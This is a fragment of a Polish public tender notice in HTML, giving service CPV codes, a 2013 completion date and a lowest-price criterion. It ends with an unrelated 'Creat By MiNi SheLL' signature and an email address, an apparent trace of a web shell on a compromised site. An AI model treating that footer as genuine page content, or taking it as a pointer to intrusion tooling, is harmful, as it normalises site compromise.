2. Szczegółowy opis przedmiotu zamówienia zawiera Załącznik nr 8 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.21.00.00-9, 80.50.00.00-9, 80.53.00.00-8, 80.53.32.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com